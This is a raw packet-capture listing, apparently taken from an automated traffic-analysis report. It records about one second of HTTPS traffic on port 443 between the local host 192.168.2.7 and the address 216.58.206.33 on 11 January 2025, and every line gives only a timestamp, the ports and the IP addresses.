Jan 11, 2025 05:00:59.197736025 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:59.239335060 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.759702921 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.759980917 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.765536070 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.765628099 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.778093100 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.778165102 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.778182030 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.778223038 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.783906937 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.783983946 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.846189976 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.846251965 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.846292019 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.846311092 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.846322060 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.846369028 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.848793983 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.848858118 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.848867893 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.848903894 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.855057001 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.855120897 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.855144978 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.855182886 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.861424923 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.861488104 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.861500978 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.861536026 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.867789984 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.867860079 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.867872953 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.867908001 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.873969078 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.874036074 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.874048948 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.874090910 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.880314112 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.880378962 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.880390882 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.880424976 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.886488914 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.886542082 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.886616945 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.886651993 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.893623114 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.893699884 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.893716097 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.893752098 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.898124933 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.898169994 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.898180008 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.898211956 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.903942108 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.904001951 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.904016972 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.904050112 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.911586046 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.911643028 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.913902044 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.913969994 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.915498018 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.915566921 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.934963942 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.935023069 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.935043097 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.935081959 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.935095072 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.935102940 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.935117960 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.935148001 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.935157061 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.935197115 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.936875105 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.936923027 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.937521935 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.937566042 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.942769051 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.942837954 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.942852020 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.942917109 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.942930937 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.942986965 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.948069096 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.948132992 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.948220968 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.948280096 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.953531027 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.953587055 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.953624964 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.953674078 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.956722975 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.956773043 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.956785917 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.956840038 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.961708069 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.961755991 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.961762905 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.961800098 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.966320992 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.966370106 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.966377020 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.966415882 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.972954035 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.973023891 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.973059893 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.973104000 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.977511883 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.977571011 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.977579117 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.977623940 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.982106924 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.982161045 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.982176065 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.982224941 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.986864090 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.986928940 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.987005949 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.987059116 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.991255999 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.991317987 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.991334915 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.991384029 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.995835066 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.995888948 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:01.995903015 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:01.995955944 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.000211954 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.000273943 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.000288010 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.000348091 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.000360966 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.000413895 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.004249096 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.004306078 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.004317999 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.004378080 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.006917953 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.006975889 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.006989002 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.007050037 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.012101889 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.012149096 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.012164116 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.012209892 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.015470982 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.015527964 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.015620947 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.015682936 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.019423962 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.019475937 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.019490004 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.019536018 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.022607088 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.022656918 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.022665024 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.022701025 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.026458025 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.026520014 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.026529074 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.026567936 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.030208111 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.030260086 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.030292988 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.030327082 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.032304049 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.032356024 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.032366037 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.032398939 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.034305096 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.034351110 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.034357071 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.034396887 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.036802053 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.036851883 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.036859035 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.036890030 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.038348913 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.038403988 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.038410902 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.038441896 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.039973974 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.040024042 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.040689945 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.040740967 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.042989969 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.043031931 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.043168068 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.043205023 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.043632030 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.043785095 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.043827057 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.043869972 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.048243046 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.048307896 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.049418926 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.049474001 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.051719904 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.051764965 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.051788092 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.051821947 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.054029942 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.054083109 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.054090977 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.054127932 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.056071997 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.056119919 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.056130886 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.056166887 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.057605028 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.057658911 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.057667017 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.057698965 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.058465958 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.058507919 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.058626890 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.058681011 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068041086 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068087101 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068121910 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068154097 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068162918 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068200111 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068218946 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068248987 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068293095 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068325043 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068345070 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068380117 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068389893 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068420887 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068424940 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068439960 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068460941 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068485022 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.068504095 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.068542957 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.069127083 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.069161892 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.069169044 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.069201946 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.071258068 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.071326971 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.071336985 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.071372032 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.073029041 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.073076010 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.073088884 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.073146105 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.075223923 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.075325012 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.075335026 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.075372934 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.077661991 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.077703953 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.077819109 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.077857018 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.079329967 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.079377890 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.079387903 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.079425097 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.081095934 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.081136942 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.081234932 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.081279993 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.083039999 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.083080053 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.083182096 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.083224058 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.085278034 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.085321903 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.085333109 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.085371017 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.085377932 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.085411072 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.087094069 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.087145090 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.087152958 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.087188959 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.088882923 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.088932037 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.089375019 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.089416027 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.090842009 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.090900898 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.090908051 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.090945959 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.093519926 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.093559980 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.094424009 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.094466925 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.095163107 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.095206976 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.095213890 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.095247030 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.096607924 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.096649885 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.096656084 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.096690893 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.098232985 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.098284006 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.098290920 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.098325968 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.100233078 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.100275993 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.100380898 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.100416899 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.101831913 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.101881981 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.101963997 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.102001905 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.104018927 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.104068041 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.104166985 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.104206085 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.105529070 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.105565071 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.105573893 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.105621099 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.107567072 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.107620955 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.107916117 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.107955933 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.109061003 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.109101057 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.109222889 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.109258890 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.111010075 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.111056089 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.111066103 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.111105919 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.112844944 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.112889051 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.112895966 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.112929106 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.114546061 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.114588022 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.114595890 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.114629984 CET	49971	443	192.168.2.7	216.58.206.33
